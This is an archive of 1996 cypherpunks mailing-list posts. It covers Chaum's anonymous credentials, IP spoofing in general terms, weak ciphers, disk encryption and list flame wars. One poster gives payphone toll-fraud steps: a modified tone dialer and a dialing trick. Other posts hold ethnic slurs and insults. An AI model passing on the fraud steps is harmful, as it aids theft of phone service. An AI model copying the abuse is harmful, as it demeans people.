Chaum's approach to the "negative credential" problem.

In essence his method allows you to prove that you haven't cheated on
any of your contracts, without revealing any more about yourself than
that.  Chaum uses what he calls "sequenced couples", which are
sequences of pseudonym pairs such that credential A on one pair of the
sequence can be transformed by the user into credential B on the next
pair.  This ties into his whole scheme, which is a bit too complicated
to explain here.

What I will describe is a very simplified version of what Chaum has.
Chaum's description can be hard to follow but takes care of a lot more
possibilities.  His full paper, which BTW is my favorite crypto paper
of them all, is:

   "Showing Credentials Without Identification: Signatures Transferred
   Between Unconditionally Unlinkable Pseudonyms," D. Chaum, Accepted but
   not Presented Auscrypt '89.

The general idea is this.  Every time you engage in a contractual
relationship with someone it is done under the auspices of an
"anonymous credential" organization.  You first show your contract
partner a credential from the AC org which guarantees that you have
not cheated anyone so far.  After you participate in your current
interaction, if it completes to everyone's satisfaction, you are given
a new credential by the AC org which proves that you still haven't
cheated.  Each credential can only be used once, so if you cheat
someone you can't get a new one.

There is a simple and obvious solution which satisfies these
requirements.  That is to use a blinded signature exactly as is done
with DigiCash coins.  You get your first credential on registering
with the AC organization.  (Here we have a bit of a bootstrapping
problem, in that the AC org needs to make sure you don't register more
than once.  But actually since things will be blinded you can just
use your SS# or other identity documents.)  The credential is a blind
signature, unlinkable to your identity.

When you go to contract with someone, you show your credential and the
AC confirms that it hasn't been used before (exactly like checking for
double spending on coins!).  The AC marks the credential as being in
the "in use" state (putting it on its own private list of such
credentials).  Then when your contract completes successfully, your
partner certifies this fact to the AC, and it then retires your old
credential and issues you a new, freshly blinded credential.  This
credential is unlinkable to your earlier one or to your identity, but
it proves that you haven't cheated and you can show it the next time
you need to make a contract.

Now, obviously this simple solution has problems:

 - You can transfer credentials to other people.
	Chaum's more elaborate solution links the credentials to your
	pseudonyms.
 - You could get cheated by your contract partner who won't authorize
   a new credential for you even though you completed your contract.
	This happens today, unfair credit rating blotches.  There
	would have to be some kind of arbitration procedure.
 - There is no way of distinguishing someone who's done dozens of
   successful contracts from someone who's done only one.
	This is a feature, not a bug... But if you want you can show
	positive credentials from earlier participants; Chaum's method
	allows them to be linked to your new pseudonyms.
 - You can only have one contract going at once.
	Chaum has some solution involving time limits but I've never
	fully understood it.  The general idea might be that when you
	go into the contract the AC gives you a new credential which
	means "he hasn't cheated anybody so far, and if he does cheat
	someone we'll know about it by <date>".  <date> would be the
	date of completion of the contract.  This is still a blinded
	credential, so the date gets encoded in the signature.  Chaum
	shows how you can even blind the date, moving it in to some
	earlier date (but never out).  Then you can use this
	credential to establish a new contract as long as the date
	hasn't expired.  It gets complicated once you have multiple
	contracts with different expiration dates, though.

Although this solution is somewhat simplified, hopefully it will give
people a picture of how negative credentials can be dealt with while
still retaining full anonymity in contract relationships.

Hal




	






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Tue, 22 Oct 1996 06:03:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Prof Shamir arrested
Message-ID: <199610221301.PAA08514@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Bert-Jaap Koops (E.J.Koops@kub.nl) wrote:

: Jim Bell wrote:
: [many things on "fraud"]

: Excuse me if I don't react on this in detail. We have already 
: explained it, and there it stands: fraud means playing a game without 
: abiding by its rules. It's perfectly legitimate to establish a game 
: and to introduse rules of the game with it. If you want to play the 
: game, play by its rules, otherwise don't play it. If you play it 
: while cheating, though, you must bear the consequences ("go directly 
: to jail" ;-).

: Bert-Jaap

What Mr. Bell probably means is that 'if the powers that be' decide 
to unilateraly change the rules, you are lost in limbo. The notion
that 'the powers that be' can be relied opun is seriously flawed,
for example take in account some of the dealings of our own guvment,
the abolishing of the WIR -overnight-, the proposals of Vermeent
that totally neglected art. 1 WvSr.

Basicly 'fraud' is a definition that benefits 'the powers that be',
one that seriously harms our rights and liberties. You also state
"If you want to play the game, play by its rules, otherwise don't 
play it." Well sometimes people have no other option then to play,
and dropping out if gouvernment changes the rules unilateraly can 
be to costly an option ..

bEST Regards,
--
 Alex de Joode		    http://www.replay.com/people/adejoode
 I have a linux emulator for Win95: it's called "loadlin" ... *g*




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Ghio <ghio@myriad.alias.net>
Date: Tue, 22 Oct 1996 12:27:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: IP spoofer
Message-ID: <199610221926.PAA27382@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Assuming that this was I troll, I took this to private mail.  Since
there is some relevance to computer security and anonymity I am
forwarding it back to the list.  Here is my reply to him:


>>> Anyone got a good IP spoofer that can spoof the whole domain?  The 
>>only
>>> shit I can find is those shitty ones that spoof the first part of 
>>the
>>> IDENTD which is possible to do in mIRC if you use it.  Oh yeah, it 
>>has to
>>> be for Win95.  Yes I know that no one likes win95 but I dont have a
>>> choice....I'll tell about that later.
>>
>>You're kidding, right?
>>
>>Either that or you need to find out who is forging mail from you. :)
>>
>Why would i be kidding...what forging mail....


Well, you posted to a mailling list about cryptography and asked a
silly question about IP spoofing.  Smells like a troll.  Apparently
others thought so too; I guess I was the only one silly enough to
respond.

"...what forged mail..."
Well, your whole post was about forging the sender...


Now, to answer your question:

In order to do a successful IP spoofing, you must either gain access 
to the routing mechanism for one or more non-local IP addresses, or
spoof a DNS (Domain Name System) server.  To send packets with a
forged IP address generally requires substantial ability to modify
the behavior of the local TCP stack.  Since Win95 does not provide
such functionality via the winsock.dll interface, and the source
code to the tcpip module is not available, in order to use Win95 for
such purposes would necessitate rewriting and replacing a
substantial portion of the IP-networking code.  Since you expressed
no interest in doing so, I assumed you were joking when you said
that you wanted to use Win95.  On operating systems which provide an
interface for the user to insert raw packets into the local tcp/ip
stack, ip spoofing is much more practical.  Please see the post I
made to the list about a month ago on the subject of IP Tunneling.
I included two scripts, written under the Linux Operating System,
which serve to give you a non-local IP address (using ssh as the
tunneling transport mechanism).  I assume that this would be
sufficient for the purpose you intend.  You will, however, need to
find a cooperative network administrator from whom to borrow an IP
address.

The other option is DNS spoofing.  The simplest form of this is to
only forge the reverse-dns lookup.  This requires access to the
reverse-dns server, or merely suffient information about it to forge
packets from it.  (eg information obtained using a packet sniffer on
the local ethernet)  This method is fairly widely known and
practiced.  For this reason, most servers now check the reverse-dns
against a forward-lookup, so you are unlikely to succeed at doing
this.  It might also be possible to engage in a denial-of-service
attack (such as a packet flood) in order to prevent the reverse-dns
lookup.  This is, however, of limited utility since the IRC server,
if it accepts a connection without a reverse-dns entry, would
publicly display the numeric address, which anyone could then
independently look up, or do a traceroute on.

I hope this answers your questions about IP spoofing.  In the future,
please try to familiarize yourself with the ongoing list discussions,
as this will encourage people to take your questions more seriously.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kwit@iap.net.au
Date: Tue, 22 Oct 1996 00:40:14 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [Fwd: Re: Reno at FCBA]
Message-ID: <326D4CC3.119C@iap.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Erik E. Fair (Time Keeper) wrote:
> 
 all...
> 
>         Erik




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kwit@iap.net.au
Date: Tue, 22 Oct 1996 00:42:15 -0700 (PDT)
To: "by way of Tom Lojewski <crumrig@us-state.gov>
Subject: Re: GET ME OUT OF HERE - TOO!
In-Reply-To: <1.5.4.32.19961022012046.00821074@proxy.pronetc.com>
Message-ID: <326D4D59.1CFB@iap.net.au>
MIME-Version: 1.0
Content-Type: text/plain


by way of Tom Lojewski wrote:
> 
> SUBSCIBE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kszczypi@tele.pw.edu.pl (Krzysztof Szczypiorski)
Date: Tue, 22 Oct 1996 06:47:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: TMN, Q3 and security
Message-ID: <199610221348.PAA07883@rhea.tele.pw.edu.pl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi c'punks,
simple question:
Does anybody know of an URL with any paper about security in Q3 interface?
 
                                 ''~``
                                ( o o )
+---------------------------oooO--(_)--Oooo----------------------------+
| Krzysztof Szczypiorski     ooo0  http://www.tele.pw.edu.pl/~kszczypi |
| kszczypi@tele.pw.edu.pl    (   )   Oooo.              gagarin@irc.pl |
+-----------------------------\ (----(   )-----------------------------+
                               \_)    ) /
                                     (_/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: Use PGP version 2.6 or later

iQCVAwUBMmzQggiNWoFBOXE9AQFz+gQAgeCRTBuLY2jXz6H8m5AkMVOHu1ZYJ/J2
gcBCl5jnQAKIQRgyghfCy7MVkQc8NkB+R9kyHTG0eg+pCQusKVnJzr3cjPX2vQOI
a7dNezo7O53C0GmrWH6iV2EW89R/APi5WZ4gG8spsmcigqyelF1y/dtuvHXTccIN
fxNxuvWd0A4=
=OfuH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 22 Oct 1996 16:14:34 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: PIS_son
In-Reply-To: <1.5.4.32.19961018165938.006d39ec@pop.pipeline.com>
Message-ID: <326D5494.334A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
> 
>    10-17-96, BuWi:
> 
>    "Apple, IBM, JavaSoft, Motorola, Netscape, Nortel, Novell,
>    RSA, and Silicon Graphics Announce PICA Crypto-Alliance"
> 
>       The PICA specification will also be designed to make the
>       task of developing differing domestic and exportable
>       security requirements much easier. [GAK alliance 2.]

  John, I think you are misreading the intent here.  By making
it easier to develop separate domestic and exportable
versions of a product, we foil the government's attempt to
force weak domestic encryption because it is too much work to
maintain two different versions.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 22 Oct 1996 13:11:42 -0700 (PDT)
To: norm@netcom.com>
Subject: Re: cypherpunks ftp site
In-Reply-To: <v03010500ae91bba23301@DialupEudora>
Message-ID: <Pine.LNX.3.95.961022161050.606A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 21 Oct 1996, Norman Hardy wrote:

> I am trying to get some code from <ftp.csua.berkeley.edu:pub/cypherpunks>.
> I get:
> 
> ftp> get README.MIRRORS
> 200 PORT command successful.
> 425 Can't create data socket (128.32.43.51,20): Address already in use.
> ftp>
> 
> Any suggestions to how to get eliptic.src and elliptic.doc reported to be
> at <ftp.csua.berkeley.edu:pub/cypherpunks/ciphers>? I searched AltaVista.

There is a mirror at ftp.funet.fi/pub/crypt.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMm0q2izIPc7jvyFpAQGyDggAiqybLhaopRCUIhYrzcxUoeLZCUPqv7TB
ugaRFmyFgyqbWZVbtVSpYTbJhtFRAXlS8zTJEPRNwSNy1SNyF++vxCkL7K5sAJdp
R5grMNciTHxJqCV4qH7t5rhY/tvASEzmyCP/WVVxzzrdCYli9jgiCgqiluC6EFnr
Px/+M21BO4XVdRYiqAkGM+Uy8fdoPmxplETSWYVqUvM/UDZnejUSx7pq6nrh346c
x+nhB8T4CVudx0PeVOXhqLSg+CVOL+pOx4l/R21E7BXlERCPkLf1HqxCgAPvIDSg
o7GCIg2pHT888MElQGHmrYRgs1ruvUzgJcusNrAJorrg2vDH2ADqPw==
=arbn
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Tue, 22 Oct 1996 11:15:26 -0700 (PDT)
To: Bert-Jaap Koops <E.J.Koops@kub.nl>
Subject: Re: Prof Shamir arrested
In-Reply-To: <86A6FCB1737@frw3.kub.nl>
Message-ID: <Pine.3.89.9610221404.B75-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 22 Oct 1996, Bert-Jaap Koops wrote:

> Excuse me if I don't react on this in detail. We have already 
> explained it, and there it stands: fraud means playing a game without 
> abiding by its rules. It's perfectly legitimate to establish a game 
> and to introduse rules of the game with it. If you want to play the 
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
BIG Problem here.

> game, play by its rules, otherwise don't play it. If you play it 
> while cheating, though, you must bear the consequences ("go directly 
> to jail" ;-).
> 
> Bert-Jaap
> 

I sincerely wish the world were THAT simple - there would be fewer problems.

Very, very often particularly when international commerce is involved, 
there simply is a disagreement about how much tax is actually owed.

The laws of trade & taxation are so complex that there are often 
several ways of accomplishing the same transaction each with very
different tax liabilities.  Certain European import/export transactions 
involving multiple currencies can be incredibly complex.  Then there is 
always the VAT (Value Added Tax).

Even here in the states, where tax laws "should" be the most uniform, there 
is a fair amount of confusion and disagreement about what the ever-changing 
tax laws and reporting requirements of the individual states really 
mean.  In Tennessee, if a distributor sends a drop-shipment to an 
end-user as a service performed to a reseller, the distributor incurs a 
liability for state sales tax; even though the distributor's sale was 
tax exempt to the reseller who would have delivered it anyway.  The 
state collects twice!  Does sending mail or making a phone call into 
another state constitute a "Physical Prescence" which would incur a 
state sales tax?  North Dakota seems to think so.  What about an Internet 
prescence?

Taxing authorities _rarely_ have all the information required to 
enforce the details of their own tax laws... that doesn't stop them, of 
course.  They'll take an aggressive stance, and then it's up to *you* to 
prove them wrong.  In some cases, it may be effectively as if the 
business is "guilty until proven innocent."

If politics are involved, look out.
It sounds like Shamir got hit with a _very_ aggressive stance.  Of course
it must be less easy to defend your actions while confined.  Er, what
would crypto have to do with politics anyway?  (ahem!)

Here is the USA a few years back, we actually had a _retroactive_ change in 
the tax tables by Congress.  Isn't that nice...  A retroactive change in the 
law!  We've gotten accustomed to retroactive law changes by appellate 
courts - but this was a retroactive change by Congress.

When you _do_ know them, they may change.  There is big money in the 
changing of laws.  Those who enforce the rules may interpret them quite 
differently if money and/or politics are involved.  What does politics 
have to do with money anyway?  (ahem!)

If you have enough money, you can have the laws written to your favor, 
just like Donald Trump, Trammel Crow and dozens of other Real-Estate 
barons did when they joined George Bush's "Club-100" by contributing 
$100K and enjoying an immediate Commercial Real Estate tax cut when he 
got elected.  Looks like these folks definitely knew a good investment.  
But this is nothing.  We have a burgeoning lobbyist industry in 
Washington, and there's little or nothing anyone can do about it.

In short, I disagree very strongly that it is as simple as playing by the 
rules.  The first rule is that you cannot know all the rules.  Further, any 
rule you _do_ know may be subject to change.  You have to become an 
expert on what is likely to be static for your own purposes, and act 
within the limits of your own knowledge.  Self-knowledge being perhaps our 
greatest challenge, there are _bound_ to be problems on all sides.

Perhaps the widespread dissemination of strong crypto will ultimately 
have a scale-tilting effect on matters of taxation.

  
-Doug
"An interesting game.  The only winning move is not to play."  -War Games





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Perry Farrell <pneyz@armory.com>
Date: Tue, 22 Oct 1996 19:22:00 -0700 (PDT)
To: Michael B Amoruso <h2@juno.com>
Subject: Re: Blue Box Plans & hacker bbs's
In-Reply-To: <19961022.120700.9990.1.h2@juno.com>
Message-ID: <Pine.SCO.3.91.961022162422.27227B-100000@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text/plain


> Oh yeah I forgot one thing.  What do you mean by NPA and why cant i just

Sorry. By NPA, I meant the prefix as in xxx-NPA-xxxx in a phone number. 
It's like normal. You can't make local calls like normal because 
payphones do not use the tone system ACTS (Automated Coin Toll System) 
for local calls, they process it internally, the way privaately owned 
payphones do (CoCoTs). You need to get AT&T intoÑ?Aý the call by using 
their 10xxx extender. You dial 10288-area-npa-number and AT&T thinks it's 
a normal long distance call and the payphone is out of it. When you put 
the tones into it, it will react like a long distance call. Making local 
calls this way will cost about $3.50 but it's not real money. 

A DTMF dialer is a thing Radio Shack sells that looks vaguely like a 
remote for a TV but it has all the telephone numbers on it, like if you 
took the keypad out of your phone. When you hit a key, it produces a tone
that is recognized µ??øby the phone, that is a DTMF tone. DTMF stands for 
Dual-Tone Multi-Frequency as it is a combination of two tones. By putting 
a 6.5335 mhrtz crystal in place of the original one, the asterisk (*) key 
will now produce the nickel tone (1700mhz+2200mhz) and if you got a 
dialer with memory, you can program it to play a quarter, 1/2 sec pause, 
quarter... etc. It is really easy but you need to be able to solder. Me 
and a friend made two of these and almost broke both, RS doesn't make 
them incredibly high quality. You might also want to get one soon because 
RS is going to stop selling them (that's what I've heard at least).

				pneyz -/- Phone Losers of America (PLA) -\-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Perry Farrell <pneyz@armory.com>
Date: Tue, 22 Oct 1996 19:22:18 -0700 (PDT)
To: Michael B Amoruso <h2@juno.com>
Subject: Re: Finally -- A crypto question from me...HD encryption
In-Reply-To: <19961022.120701.9990.2.h2@juno.com>
Message-ID: <Pine.SCO.3.91.961022163414.27227C-100000@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 22 Oct 1996, Michael B Amoruso wrote:

> Are there any good programs out there that can encrypt my HD??  Since
> there probably are, please mention some and where I can get them.  Also,
> no one mention PGP.

Yes, the KOH disk encryption system. It is a small little thing that 
encrypts the FAT (I believe) and nothing will work unless you know the 
password. I also have a thing from the Navy that they use on their 
computers which might encrypt the HD (I haven't checked it out yet). You 
can find KOH at just about any extensive file listing of crypto or 
hacking stuff. Try to find Silicone Toad's File Resources, as it has the 
program.

					pneyz (pneyz@armory.com)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Tue, 22 Oct 1996 06:42:14 -0700 (PDT)
To: Alan Olsen <alan@ctrl-alt-del.com>
Subject: Re: Prof Shamir arrested
In-Reply-To: <3.0b36.32.19961022034515.00e5a308@mail.teleport.com>
Message-ID: <Pine.GSO.3.93.961022163519.16175B-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain


 Tue, 22 Oct 1996, Alan Olsen wrote:

> >Can you tell more of this? There is an Windows disk encryption utility
> >called Teamware Crypto that uses FEAL-8. This program is quite popular in
> >Europe, distributed and made by ICL Data.
> 
> The attacks on FEAL are pretty lengthy.  _Applied Cryptography_ 2nd edition
> by Bruce Schneier has a list of attacks on page 311.  The Shamir attack is
> not the one to worry about.  Matsui and Yamagishi have an attack that
> breaks it in 2^15 known plaintexts.

I have the book but unfortunately I gave it to a friend for some time to
read it :) 

Anyway I personally use F-Secure Desktop which uses Blowfish and I am
happy with that. Just that I thought the product Teamware Crypto is not as
secure as the marketing materials say.

Jüri Kaljundi                         AS Stallion
jk@stallion.ee                        WWW ja andmeturva teenused
                                      http://www.stallion.ee/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Bradley <paul@fatmans.demon.co.uk>
Date: Wed, 23 Oct 1996 07:59:58 -0700 (PDT)
To: "gweissman@spyrus.com>
Subject: Re: OTP
Message-ID: <846082072.4988.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Ooops : there is no possible attack at all with a properly
> implmented OTP cryptosystem.  There is no keyspace to "brute-force"
> search.  Any message is as likely as any other.  Check Schneier.

Yeah, someone else pointed this out to me, it was just a slip of the 
keyboard, I think I started of talking about an OTP and slipped into 
stream cipher mode... 


  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Bradley <paul@fatmans.demon.co.uk>
Date: Wed, 23 Oct 1996 08:06:39 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,
Message-ID: <846082070.4963.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Yes. Timmy May is a fat turkey.
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

Doctor Vulis, you do indeed enlighten us mere mortals in an 
astonishing way with your witty commentary and razor sharp mind.

How long did it take you to think of the above insult?

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Bradley <paul@fatmans.demon.co.uk>
Date: Wed, 23 Oct 1996 08:49:53 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: OTP
Message-ID: <846082070.4964.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Where do these idiots come from and why do they end up on this mailing list?

I have asked myself the same question many a time when reading your 
inane and witless postings

> > > Can you explain to me how your one time pad algorithm is any better than
> > > encryption something with, say, RC4 or any other cipher using a key that
> > > is the same length as the seed for your PRNG?
> >
> > Well for a start there is no possible cryptanalytic (rather than
> > brute force) attack on a one time pad, the system can be
> > mathematically proven to be secure with a very simple bit of
> > statistics.

The proof is intuitive, if there is equal or greater entropy in the 
pad as there is in the message and the pad is used in a proper OPT 
fashion (never repeating) there is no way to determine the correct 
decryption, as simple as that doctor fuckup.
 
As for when I said brute force, fault admitted, I was probably 
thinking about a stream cipher or something, as you know as well as 
me (or probably don`t as you know nothing about cryptography) there 
is no concept of a brute force attack on an OTP as there are many 
correct decryptions for different pads.

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 22 Oct 1996 15:05:01 -0700 (PDT)
To: Michael B Amoruso <h2@juno.com>
Subject: [noise][no-cripto-here] Re: Blue Box Plans & hacker bbs's
In-Reply-To: <19961022.120700.9990.0.h2@juno.com>
Message-ID: <Pine.BSF.3.91.961022164454.15686C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



> >Bell payphone (CoCoTs and USWest phones do not work) and dial 
> >"1+area+npa+number", like a normal call. Then play the tones. For a 
> >local 
> >call, dial "10288+area+npa+number", which makes AT&T think it's along 
> >distance call. 
> >
> >					pneyz (pneyz@armory.com)
> >
> 

'scuze the diseased marsupial for askin' but isn't the npa the "area code"?

NXX-NXX-XXXX, where the first three are the NPA (Numbering Plan Area, or
"area code") or Service Access Code (800,500), the next three are the
central office code, and the last four are the line code? 

See the E.164 standard, NANP sub-section.

While you're at it, look around for some statutes on toll fraud.

God, I love Juno.  ;)

We now return you to your regular non-crypto stupidity ... 

-r.w.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Tue, 22 Oct 1996 17:41:39 -0700 (PDT)
To: Norman Hardy <norm@netcom.com>
Subject: Re: cypherpunks ftp site
Message-ID: <199610230038.UAA06768@caig1.att.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:51 PM 10/21/96 -0700, you wrote:
>I am trying to get some code from <ftp.csua.berkeley.edu:pub/cypherpunks>.

Try http://www.csua.berkeley.edu/ ; you may need to wait till they're not busy.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 22 Oct 1996 17:37:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Timmy May is a jerk
In-Reply-To: <7H87VD38w165w@bwalk.dm.com>
Message-ID: <v03007801ae9324a698d5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:05 PM -0400 10/22/96, Ray Arachelian wrote:
>On Tue, 22 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
>
>> Timmy May continues to post nonsensical praises in his name using
>> an anonymous remailer....
>
>How do you know that it's him?

I'll comment on this only because I plan to comment on another point below.
So, while I'm at it...

I've seen several of these anonymously posted "Tim is a fine person" and
"Tim is a saint amongst saints" messages. I delete them as I do the crud
Vulis posts posts anonymously. In fact, the _style_ of these praise posts
look like a pastiche of Vulis' style...my working assumption is that they
are also being written by Vulis, for his own purposes. (As with that other
crazy Russian, VZNUri, and the nom de nym he adopted since arriving in
America, "Lance (you can call me Larry) Detweiler," Vulis constant refers
to "tentacles" when he is almost certainly _the_ major user of anonymous
posts. Ironic that both Vulis and Detweiler railed against the things they
were themselves the heaviest users of.)


...
>I have been on this list since 1992 and can attest to the fact that the
>above paragraph which you have written is false.  I have seen more personal
>attacks, flames, racial prejudice, and lies from you than from anyone
>else on here.  I guess you are of the belief that if you lie in every
>message about someone violently enough, eventually someone will believe
>your bullshit.

Vulis is a student of "the Big Lie," the notion that if one repeats a lie
often and loudly enough, it begins to be believed. Hey, it worked for
Adolph.

As I've said, I've received several messages from twits asking me why I'm
not defending myself on a daily basis against Vulis, and speculating that
perhaps this means Vulis is right and I am indeed a dandruff-covered
homosexual Sovok Tchurka Jew.

Several of these correspondents are now residents in that part of
cyberspace I call my killfile.

By the way, I have remained utterly silent on this "Let's fly Dimitri to
the Bay Area!" nonsense (except for some private mail to Sandy and R.
Wombat about it). I personally think this whole "Dimitri fund" is a lousy
idea. First, it has consumed bandwidth (at least 30-40 messages, I figure).
Second, the result was predictable, that DLV would of course dangle his
answer for days or weeks, but would ultimately worm out of a straight
answer. Third, it sends the wrong message. I choose to killfile jerks, not
reward them with airfare and hotel accomomadations! If fools and jerks are
rewarded with trips for their boorishness, guess what we'll get? Yes, even
more boors and knaves.

Oh, and I certainly hope no one expected _my_ attendance at that "Vulis
greets the Bay Aryans" meeting. I certainly wouldn't drive 100 miles to San
Francisco to meet a cretin like Vulis.

I suggest that, as with Detweiler and as with other disruptors, _attention_
is what he craves. The more the list is disrupted, the better he likes it.
All of this foo-faw about whether he'll accept "our" invitation (Sandy's,
of course), and all of the denunciations of his rants, just feeds this
process.

No, I won't "take the pledge" to stop talking about him, as some are
already starting to do. I believe in actions, not slogans. I guess I'm not
much of a joiner. I never donated to the United Way, so I'm not real big
either on "Take the Pledge!!" campaigns. Killfiles are a lot more direct.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 22 Oct 1996 14:55:26 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [SERDAR ARGIC] Ray "GAK" Arachelian's role in the murder of 2,500,000 Turks, Kurds, and Sephardic Jews
In-Reply-To: <kum7VD35w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961022125859.175A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 22 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Nonsense. Timmy, Sandy, and a few other jerks on this mailing list are
> obsessed with my alleged Cossack (???) ethnicity. The massacres perpetrated
> by the grandparents and cousins of the censorous flamer, who actually
> distributes a "filtered" version of the mailing list - with responses to his
> flames edited out, is more on-topic than anything Timmy May has ever posted.

I don't debate what Tim May has posted or not.  His value to this list 
far outweighs yours.  I debate that what you are posting here in this 
thread is nothing more than flames, and therefore off topic.

My ancestors are not a topic for the cypherpunks, and if you go and read
messages sent by me your way have zero refrences to your ethnic
background.  Your racially loaded, "dandruff-covered" vitriolic flames
have no place here.  However this is totally irrelevant since the subject
is off topic. 

As for "censorous flamer" you sir have done plenty to make my filtered 
list thrive.  I have received by far more new subscribers to the filtered 
version than ever before.  Why?  Because everyone is tired of you and 
your silly flames.  Were I mercenary enough to charge money for the 
filtered list, you, sir would have made me a rich man.

However, you are doing nothing to hurt me in any way.  I don't care what 
your oppinions are as to my ancestry, nor do I care to satisfy them one 
way or another by answering your cretinous flames.

Other than to point out that you need some serious growing up.  I've seen 
3 year olds more mature than you Vulis.

You seem to think that you can get away with anything. But keep pushing, 
eventually you'll say something that will wind you up with a slander suit.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
